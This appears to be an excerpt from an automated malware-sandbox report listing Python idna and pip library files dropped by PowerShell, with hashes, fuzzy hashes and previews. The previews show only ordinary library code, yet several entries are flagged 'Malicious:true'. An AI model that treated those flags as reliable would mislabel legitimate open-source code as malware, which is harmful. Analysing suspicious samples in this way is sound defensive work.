                                                                                                                                                                                                                              MD5:94471F3DEF69FB50CC31AC3E1FADCA64
                                                                                                                                                                                                                              SHA1:277EBBF76AAD5C12B46BD044F2D4A519E2B93622
                                                                                                                                                                                                                              SHA-256:FE84E901CBBD1836AB2338D70E71F2576ADCA9A4D1AE9FBAAEAF2D6160EC826F
                                                                                                                                                                                                                              SHA-512:0BA7004C75AE6F90B9F18EC80940B66C72E78E0B94F7896C8B7961D8FA4ACE673AFBD79432C842330D09EA8A099E356C161905368A2C388D02C8D96A5DE1377F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.Vfw1........................r.....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.Z.d.Z...e.j...................d.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.d.e.d.e.f.d...Z.d.e.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.e.e.f.....d.e.f.d...Z.d.e.e.e.f.....d.e.d.e.f.d...Z.d1d.e.d.e.d.e.f.d...Z.d.e.d.e.f.d...Z.d.e.d.e.f.d ..Z.d.e.d.d.f.d!..Z d.e.d"e.d.e.f.d#..Z!d1d.e.d"e.d$e.d.e.f.d%..Z"d.e.e.e.e#f.....d.d.f.d&..Z$d.e.d.e.f.d'..Z%d.e.e.e.e#f.....d.e.f.d(..Z&d2d)e.d*e.d+e.d.e.f.d,..Z'd3d.e.e.e.e#f.....d-e.d.e.d*e.d+e.d.e.f.d/..Z(d4d.e.e.e.e#f.....d-e.d.e.d*e.d.e.f.d0..Z)y.)5.....)...idnadata.....N)...Union..Optional)...intranges_contain.....s....xn--u....[....]c...........................e.Z.d.Z.d.Z.y.)...IDNAErrorz7 Base exception for all IDNA-encoding related problems N....__name__..__module__..__qualname__..__doc__........:C:\Users\xbov\Desktop\pyops\Lib\site-packages\idna/core.pyr....r...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):99447
                                                                                                                                                                                                                              Entropy (8bit):5.755321675874342
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:JISwp+QvEziUn3vDj58/UF49CT9YXYHItkQut1s7lYAo5uGAZ/52:JO+gEGUbj58tp/ulAZ/Y
                                                                                                                                                                                                                              MD5:6D560C01C27AEA26E3876C60A73D7A56
                                                                                                                                                                                                                              SHA1:0B4E3DABB2A8720F86FAE5B5DF1BC9BB0E19CB76
                                                                                                                                                                                                                              SHA-256:7B60D11C822A7233F84C9489BF2F32DB780865D26D307226EC711218B2FEBE6C
                                                                                                                                                                                                                              SHA-512:7C23F97A1C1089B89038B39393DE2AB066510F8F5C44D27D9F7F508C07D5194FD691A0213D4DCEB5D2A334AF94ACD523B7ACBFAF1D7BDD3B759D87CF499CF88B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.Vf.1........................^\....d.Z.d.d.d.d.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d.....i.d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d2d...d3d...d4d...d5d...d6d...d7d...d8d...d9d...d:d.....i.d;d...d<d...d=d...d>d...d?d...d@d...dAd...dBd...dCd...dDd...dEd...dFd...dGd...dHd...dId...dJd...dKd.....i.dLd...dMd...dNd...dOd...dPd...dQd...dRd...dSd...dTd...dUd...dVd...dWd...dXd...dYd...dZd...d[d...d\d.....i.d]d...d^d...d_d...d`d...dad...dbd...dcd...ddd...ded...dfd...dgd...dhd...did...djd...dkd...dld...dmd.....i.dnd...dod...dpd...dqd...drd...dsd...dtd...dud...dvd...dwd...dxd...dyd...dzd...d{d...d|d...d}d...d~d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2609
                                                                                                                                                                                                                              Entropy (8bit):5.576884941561351
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:D6AJrOioJerYy/ORh7dJF8hHDa3XTWzFt7t2y1uOl8y7b1Pca:Wq7CdJChH+nSpt7t2y1biq
                                                                                                                                                                                                                              MD5:165C5EE6E3228B0618AC2BA9FF236EC3
                                                                                                                                                                                                                              SHA1:309C11DC551B869257B6C2B4D356635605DDEA58
                                                                                                                                                                                                                              SHA-256:AEEF2C29BE36F87ED6ED63EA1434D8AA9220B9AD1100D6FFF27613B1132FDD79
                                                                                                                                                                                                                              SHA-512:372140DE22AA23C67FCA4119098FD4E0C504C043A51C18BD17C63634435D330C79000A9D9D3416D39F511E1CD42D1E05339A315F90393DD8C4F8827C1831A8C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.VfY..............................d.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.e.e.....d.e.e.d.f.....f.d...Z.d.e.d.e.d.e.f.d...Z.d.e.d.e.e.e.f.....f.d...Z.d.e.d.e.e.d.f.....d.e.f.d...Z.y.).a.....Given a list of integers, made up of (hopefully) a small number of long runs.of consecutive integers, compute a representation of the form.((start1, end1), (start2, end2) ...). Then answer the question "was x present.in the original list?" in time O(log(# runs)).......N)...List..Tuple..list_..return.c...........................t.........|.........}.g.}.d.}.t.........t.........|.................D.]V..}.|.d.z...t.........|.........k...r.|.|.....|.|.d.z.......d.z...k(..r..&|.|.d.z...|.d.z.....}.|.j...................t.........|.d.....|.d.....d.z.....................|.}..X..t.........|.........S.).a....Represent a list of integers as a sequence of ranges:. ((start_0, end_0), (start_1, end_1), ...), such that the original. integers are exactly those x such that start_i <= x < end_i for some i...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.950769721165108
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:o7K0l/+lClm/VMOTrRctkPFK5VcK85kdVWrzSBwUIjaQkklev/+nxt:B0taCC9StIw52KNdArmBwUSaYleH+nxt
                                                                                                                                                                                                                              MD5:53447F56382A9C8627E1DE49BA689A6A
                                                                                                                                                                                                                              SHA1:AEC23B2EB87E2B821583DCDF56281E194904E060
                                                                                                                                                                                                                              SHA-256:6E11DF13D480FE0AE6CE82B6A44450B027C41E53A340270CCBB86DDA759B7924
                                                                                                                                                                                                                              SHA-512:79669E698A4C78455784DECB856BCBDBF5A682231E9BFEA92B899A0E4B59102726C5CEDC285DFFE80EE7886D1BC607E2E69375191473AEED984AF7501BBCB035
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.Vf................................d.Z.y.).z.3.7N)...__version__........BC:\Users\xbov\Desktop\pyops\Lib\site-packages\idna/package_data.py..<module>r........s..............r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):158819
                                                                                                                                                                                                                              Entropy (8bit):4.650676308616682
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:+q6QckuXZO3NF2mkghbT8kiy9Lalgl3AbcWQIr:+q+XA3zk2pzg2tAbcWb
                                                                                                                                                                                                                              MD5:FC790904C1DEF2FD87C0AC8A195E8171
                                                                                                                                                                                                                              SHA1:22A433913AFC1449CF3464BF60C9D9A027018BE3
                                                                                                                                                                                                                              SHA-256:889A8E26BA2466A2072D570FEF3A171F227A3248348002F41A5F830797521D0D
                                                                                                                                                                                                                              SHA-512:A089BE3183302076E55A747772C7BA464753F10F7CD60569113F54C182593AAFD605549005EEA20DBA4EC3B4CD91F9F0742C1410E0D307FC4063F3046E4E18BA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.Vf.&........................L.....d.d.l.m.Z.m.Z.m.Z.....d.Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f.....f.........f.d...Z.d.e.e.e.e.e.f.....e.e.e.e.f...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3426
                                                                                                                                                                                                                              Entropy (8bit):4.328658870966312
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:z6D9qYUV1SOdzSfi2yH9xtzCfiPiFyEq4h:z6RqYUPSONp2ydxd5Pi0Eq4h
                                                                                                                                                                                                                              MD5:336C73E096E6A1008B48A5E95148B94B
                                                                                                                                                                                                                              SHA1:869E4E7376DA170F9EF81546350EA8D0987C2EDF
                                                                                                                                                                                                                              SHA-256:3D2EA6F9799D493ED68FB27BBA544C6A43C3B7910127262B4F708FB6387EEEDE
                                                                                                                                                                                                                              SHA-512:1A731CCF16F5AE449FFA85B8F129A464281F029DB32E827636B1127AC7DECAB6C8F1850709FEFA708EAC1B37C761096AFCF0B98D11BA2B5005909875A2E83E30
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from .core import encode, decode, alabel, ulabel, IDNAError.import codecs.import re.from typing import Any, Tuple, Optional.._unicode_dots_re = re.compile('[\u002e\u3002\uff0e\uff61]')..class Codec(codecs.Codec):.. def encode(self, data: str, errors: str = 'strict') -> Tuple[bytes, int]:. if errors != 'strict':. raise IDNAError('Unsupported error handling \"{}\"'.format(errors)).. if not data:. return b"", 0.. return encode(data), len(data).. def decode(self, data: bytes, errors: str = 'strict') -> Tuple[str, int]:. if errors != 'strict':. raise IDNAError('Unsupported error handling \"{}\"'.format(errors)).. if not data:. return '', 0.. return decode(data), len(data)..class IncrementalEncoder(codecs.BufferedIncrementalEncoder):. def _buffer_encode(self, data: str, errors: str, final: bool) -> Tuple[bytes, int]:. if errors != 'strict':. raise IDNAError('Unsupported error hand
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):321
                                                                                                                                                                                                                              Entropy (8bit):4.7067876381245375
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:1LcQlBKlbEYBFiZmbNdPl6rZ9v+jLqBAII6A0v+Fy6QyneAJWkwID/:1hK9EYBamvPl6FoTILmy6fnYHID/
                                                                                                                                                                                                                              MD5:F1FB109A7AFB20BB1A7F89FFF1691575
                                                                                                                                                                                                                              SHA1:12BCD91FCCF01F9C1199470D492033F7FE30DD18
                                                                                                                                                                                                                              SHA-256:D3FB0E114313E02570F5DA03DEFC91857F345F5F4FC2A168501B3B816B05304E
                                                                                                                                                                                                                              SHA-512:F9A433F13634B130434353BD2DDFDF48676D796EDBE59E2AB84CEA409EAAB771488BA6037347018914A7AB3866202AB4493E6E752538A23E9373C1EA2CB7E8F9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from .core import *.from .codec import *.from typing import Any, Union..def ToASCII(label: str) -> bytes:. return encode(label)..def ToUnicode(label: Union[bytes, bytearray]) -> str:. return decode(label)..def nameprep(s: Any) -> None:. raise NotImplementedError('IDNA 2008 does not utilise nameprep protocol')..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12663
                                                                                                                                                                                                                              Entropy (8bit):4.532421859271245
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Bhlub6yqUN+so0rOqyNt5mG1LAayFk0cy6IeO7Ev9tissv5W9C6CxyaM9YBxuSc:x5Nb1LAayFk0j6IeOEFyvE9CA9Yi
                                                                                                                                                                                                                              MD5:B689F82922C2EB5830E141486278163E
                                                                                                                                                                                                                              SHA1:128F498BC1C108EC6F1F07423FECA88A5B036BCD
                                                                                                                                                                                                                              SHA-256:972869A1EDAFBA511A07FEB9C615E6A0A80EFB152A143BDCC31BB986934D3B81
                                                                                                                                                                                                                              SHA-512:CB9E23ADFD613A6EA2F49CFDE3339E52FEF04F28B194E7ACDB8DFA57E8DF61C986AE338225AA345B271B9BA01A899EE6591AF3B79A3CCD2421843E74E5ED8700
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from . import idnadata.import bisect.import unicodedata.import re.from typing import Union, Optional.from .intranges import intranges_contain.._virama_combining_class = 9._alabel_prefix = b'xn--'._unicode_dots_re = re.compile('[\u002e\u3002\uff0e\uff61]')..class IDNAError(UnicodeError):. """ Base exception for all IDNA-encoding related problems """. pass...class IDNABidiError(IDNAError):. """ Exception when bidirectional requirements are not satisfied """. pass...class InvalidCodepoint(IDNAError):. """ Exception when a disallowed or unallocated codepoint is used """. pass...class InvalidCodepointContext(IDNAError):. """ Exception when the codepoint is not valid in the context it is used """. pass...def _combining_class(cp: int) -> int:. v = unicodedata.combining(chr(cp)). if v == 0:. if not unicodedata.name(chr(cp)):. raise ValueError('Unknown character in unicodedata'). return v..def _is_script(cp: str, script: str) -> bool:. retur
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):78320
                                                                                                                                                                                                                              Entropy (8bit):3.5586717758854984
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:PSIJAnDP6rfsSl6AcHSeDx6et2wB+XM9qzo5xuH8tYpCe9hLo2UEMaMLoBSUUdLn:PcQsSySi+CT2UFzXB
                                                                                                                                                                                                                              MD5:278011C5FA7B65DDA4FD1B0B79E88ACC
                                                                                                                                                                                                                              SHA1:AC1A53F7E9D632E9E743AB1B38AB53DE33CBC536
                                                                                                                                                                                                                              SHA-256:76A470CADCE48C81CC05AD91D6562F1C3C0009E9D93EDF1E195BB563C50113E1
                                                                                                                                                                                                                              SHA-512:2C6584F88F9C7C0AB4C9D10097DAE1485A287ADACC8990927B020D4742F78AA7124F448F23EFD5219EEFE900711D98A2FA3EDF70BD1BDE86B7AB4A5B9D560B59
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# This file is automatically generated by tools/idna-data..__version__ = '15.1.0'.scripts = {. 'Greek': (. 0x37000000374,. 0x37500000378,. 0x37a0000037e,. 0x37f00000380,. 0x38400000385,. 0x38600000387,. 0x3880000038b,. 0x38c0000038d,. 0x38e000003a2,. 0x3a3000003e2,. 0x3f000000400,. 0x1d2600001d2b,. 0x1d5d00001d62,. 0x1d6600001d6b,. 0x1dbf00001dc0,. 0x1f0000001f16,. 0x1f1800001f1e,. 0x1f2000001f46,. 0x1f4800001f4e,. 0x1f5000001f58,. 0x1f5900001f5a,. 0x1f5b00001f5c,. 0x1f5d00001f5e,. 0x1f5f00001f7e,. 0x1f8000001fb5,. 0x1fb600001fc5,. 0x1fc600001fd4,. 0x1fd600001fdc,. 0x1fdd00001ff0,. 0x1ff200001ff5,. 0x1ff600001fff,. 0x212600002127,. 0xab650000ab66,. 0x101400001018f,. 0x101a0000101a1,. 0x1d2000001d246,. ),. 'Han': (. 0x2e800
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1881
                                                                                                                                                                                                                              Entropy (8bit):4.535141327144005
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:wicdAdy/ORhzgnc9SbrMvypDGS6vbqgCbHmSXikyXP:pc25YcUk0DGS6mgCbHmOPy/
                                                                                                                                                                                                                              MD5:F67C377C6AB481B1059598CA94AF5555
                                                                                                                                                                                                                              SHA1:0A271B1F7519EAD8D311EA333A457CF87CB13B74
                                                                                                                                                                                                                              SHA-256:601AF87D162E587EE44CA4B6B579458CCDB8645D4F76F722AFE6B2C278889EA8
                                                                                                                                                                                                                              SHA-512:ACBB2CEB84393BD8936297C47F781BB0E0348168763CE95786B2722EC4FE3B53A423F34CA89F9E245B1061657D4104F43D44DA2AF5D92225E4D1F2DF929C7A84
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".Given a list of integers, made up of (hopefully) a small number of long runs.of consecutive integers, compute a representation of the form.((start1, end1), (start2, end2) ...). Then answer the question "was x present.in the original list?" in time O(log(# runs)).."""..import bisect.from typing import List, Tuple..def intranges_from_list(list_: List[int]) -> Tuple[int, ...]:. """Represent a list of integers as a sequence of ranges:. ((start_0, end_0), (start_1, end_1), ...), such that the original. integers are exactly those x such that start_i <= x < end_i for some i... Ranges are encoded as single integers (start << 32 | end), not as tuples.. """.. sorted_list = sorted(list_). ranges = []. last_write = -1. for i in range(len(sorted_list)):. if i+1 < len(sorted_list):. if sorted_list[i] == sorted_list[i+1]-1:. continue. current_range = sorted_list[last_write+1:i+1]. ranges.append(_encode_range(current_range[0
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21
                                                                                                                                                                                                                              Entropy (8bit):3.725650756112093
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:cvbLx3n:8vx3
                                                                                                                                                                                                                              MD5:65649194B48D79F2F8D8652D61F0A290
                                                                                                                                                                                                                              SHA1:22BD8E4062536BB3664FCF68B7DB40414BF52D08
                                                                                                                                                                                                                              SHA-256:4E4B742A721EC889671DD74E6B3F564A4922B25360A24240B84FA9E46A2B32AA
                                                                                                                                                                                                                              SHA-512:1E6AB18BBB6C6B0CB765E753EAF6347A0A6806646B853F5FB34EAF32D4924878BD48A4142C123BE7530FFCBA9ABDCD81E15F21FC08CBAF3DC81FCA1ED5E6FC20
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:__version__ = '3.7'..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):206503
                                                                                                                                                                                                                              Entropy (8bit):4.508401389303045
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:HkqaBMPgxfMblwO2dAnNFsrWzuF/AxaAJ:VCCnbsrWSF/Awu
                                                                                                                                                                                                                              MD5:FD1B0B091235C9F05CC15080486DF94D
                                                                                                                                                                                                                              SHA1:2D44271DCC2DE64EEB2460F3164180C5CDF20193
                                                                                                                                                                                                                              SHA-256:D4ABA4B16A8BB9C70F5E6DAEC9156485F8852CD22133F1F69B86B309C9CEA845
                                                                                                                                                                                                                              SHA-512:986F7708858B178969902F578B7001338463F944EBE978FCD5534F5F4267EA034F45B3FB85B90FE6DEF3AD566DBBB0E750740F7EE5B83190EF451C19E776A2E2
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# This file is automatically generated by tools/idna-data.# vim: set fileencoding=utf-8 :..from typing import List, Tuple, Union..."""IDNA Mapping Table from UTS46."""...__version__ = '15.1.0'.def _seg_0() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]:. return [. (0x0, '3'),. (0x1, '3'),. (0x2, '3'),. (0x3, '3'),. (0x4, '3'),. (0x5, '3'),. (0x6, '3'),. (0x7, '3'),. (0x8, '3'),. (0x9, '3'),. (0xA, '3'),. (0xB, '3'),. (0xC, '3'),. (0xD, '3'),. (0xE, '3'),. (0xF, '3'),. (0x10, '3'),. (0x11, '3'),. (0x12, '3'),. (0x13, '3'),. (0x14, '3'),. (0x15, '3'),. (0x16, '3'),. (0x17, '3'),. (0x18, '3'),. (0x19, '3'),. (0x1A, '3'),. (0x1B, '3'),. (0x1C, '3'),. (0x1D, '3'),. (0x1E, '3'),. (0x1F, '3'),. (0x20, '3'),. (0x21, '3'),. (0x22, '3'),. (0x23, '3'),. (0x24, '3'),. (0x25, '3'),. (0x26, '3'),. (0x27, '3'),. (0x28, '3'),. (0x29, '3'),. (0x2A, '3'),. (0x2B,
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):355
                                                                                                                                                                                                                              Entropy (8bit):4.745572780794588
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:1REYB9HZiEw3G5laLR0S8XiAsUSiuI9X+KLELwJqWl3VY2wVdLcJ+9EWaFSQ3Z/X:1REYB9f5gl0SQiASiuI+dCle2+LcJWG1
                                                                                                                                                                                                                              MD5:439A7014D3D463C5591410E520FF6B00
                                                                                                                                                                                                                              SHA1:AEACB5F33C115DC100C18C45D91DC9E8E54FDA49
                                                                                                                                                                                                                              SHA-256:A009359C5A4B994552E4B9FB371BCDA06527E55927E851908CF68D0DFF10F299
                                                                                                                                                                                                                              SHA-512:B733A32D51D6B7E289B1563D53BE2A5BFCA180B98A45245941384EE2290733708F7253D7CB8B550BFC5F169A572329005DB96AC071685AE6996C2C71B7538F50
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import List, Optional..__version__ = "24.0"...def main(args: Optional[List[str]] = None) -> int:. """This is an internal API only meant for use by pip's own console scripts... For additional details, see https://github.com/pypa/pip/issues/7498.. """. from pip._internal.utils.entrypoints import _wrapper.. return _wrapper(args).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):854
                                                                                                                                                                                                                              Entropy (8bit):4.657090303713565
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:yKyKD5NqfFCm0le1H/A/Xv/YWVrOmUfvgUOfFjxl+giRJvzVqRu6Jo+Yh2paAqin:ZXNNqdv0le1fA/4cevUFtib00bepao/v
                                                                                                                                                                                                                              MD5:A56E19F54A80E824D64E8F72C9EE78E8
                                                                                                                                                                                                                              SHA1:4F4087AF34A52C3C155EA0274DE2E4DFEC45D431
                                                                                                                                                                                                                              SHA-256:5B36E11D74DB484EA0058D7D98D37D9B8B39A3FDFAE4B3AF4D84A0AA06DD0611
                                                                                                                                                                                                                              SHA-512:3270D68FD690D122C4ABA74AF2B88621405A58E949E926BF38476591F4EF4DB36E37B58CFAB9FD9E18F64857543E088E96762F18CFB32D58DA4E44FFC9AD0A06
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import os.import sys..# Remove '' and current working directory from the first entry.# of sys.path, if present to avoid using current directory.# in pip commands check, freeze, install, list and show,.# when invoked as python -m pip <command>.if sys.path[0] in ("", os.getcwd()):. sys.path.pop(0)..# If we are running from a wheel, add the wheel to sys.path.# This allows the usage python pip-*.whl/pip install pip-*.whl.if __package__ == "":. # __file__ is pip-*.whl/pip/__main__.py. # first dirname call strips of '/__main__.py', second strips off '/pip'. # Resulting path is the name of the wheel itself. # Add that to sys.path so we can import pip. path = os.path.dirname(os.path.dirname(__file__)). sys.path.insert(0, path)..if __name__ == "__main__":. from pip._internal.cli.main import main as _main.. sys.exit(_main()).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1444
                                                                                                                                                                                                                              Entropy (8bit):4.9657510210884865
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:m+7rAGZi/boI1X076l9Lo20E8zql0CeRIpXvPLkQP5mmnJIQ804LZGp3UsAu:m+7Umyo2X076l9LoVi6EXL1P5vZ4LsdB
                                                                                                                                                                                                                              MD5:6DB12AA0D3B88CFE811DEE51E5CCD04C
                                                                                                                                                                                                                              SHA1:4F1643CAC3326F12464EAB68CAB415A5726D57A2
                                                                                                                                                                                                                              SHA-256:127ADF2A628CCD601DAA0FC989C2C238FF58F79531EF31E1E0E6EFA8BB50723A
                                                                                                                                                                                                                              SHA-512:64B86E073CC23DD28E64C631BA0038EAA515B68BB18C18A7F8642C5091AE47B777DD81798B075AA054A77D3FD47F02DF8792036859638E6D856203C3638A0539
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""Execute exactly this copy of pip, within a different environment...This file is named as it is, to ensure that this module can't be imported via.an import statement.."""..# /!\ This version compatibility check section must be Python 2 compatible. /!\..import sys..# Copied from setup.py.PYTHON_REQUIRES = (3, 7)...def version_str(version): # type: ignore. return ".".join(str(v) for v in version)...if sys.version_info[:2] < PYTHON_REQUIRES:. raise SystemExit(. "This version of pip does not support python {} (requires >={}).".format(. version_str(sys.version_info[:2]), version_str(PYTHON_REQUIRES). ). )..# From here on, we can use Python 3 features, but the syntax must remain.# Python 2 compatible...import runpy # noqa: E402.from importlib.machinery import PathFinder # noqa: E402.from os.path import dirname # noqa: E402..PIP_SOURCES_ROOT = dirname(dirname(__file__))...class PipImportRedirectingFinder:. @classmethod. def find_spec(self, fullnam
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):667
                                                                                                                                                                                                                              Entropy (8bit):5.407957564968926
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:M/eRzYA/83nwfSQiASiuI+dCle2+LcJ22RkyKNncq6/5jO2lJBMCkkyZYr:xJ/8gKQdSLIeC6LcJ2UkyKNn6llJBYxm
                                                                                                                                                                                                                              MD5:4B552FDC1E16F393F5CAD090398F4992
                                                                                                                                                                                                                              SHA1:7F6CE6A9FF2C9E6B2C0668E51641572F7396FA56
                                                                                                                                                                                                                              SHA-256:324E745D4E6AE402BACB3FD805B5E225989CE35E3280671D3FF92D0CFD44E417
                                                                                                                                                                                                                              SHA-512:B2AEBEBC61EAD4B450D0EACCFF18B62D9E07C00D808F976F514CB5C98B35EBC8A0EDD417A36B85928F3D8B2B8D95753652B92B8393FF5ED25D146BF35F58BD35
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vfc.........................6.....d.d.l.m.Z.m.Z...d.Z.d.d.e.e.e.........d.e.f.d...Z.y.)......)...List..Optionalz.24.0N..args..returnc...........................d.d.l.m.}.....|.|.........S.).z.This is an internal API only meant for use by pip's own console scripts... For additional details, see https://github.com/pypa/pip/issues/7498.. r....)..._wrapper)...pip._internal.utils.entrypointsr....).r....r....s.... .=C:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/__init__.py..mainr........s..........9....D.>........).N)...typingr....r......__version__..str..intr......r....r......<module>r........s)..........!...........x...S...."......c.....r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):823
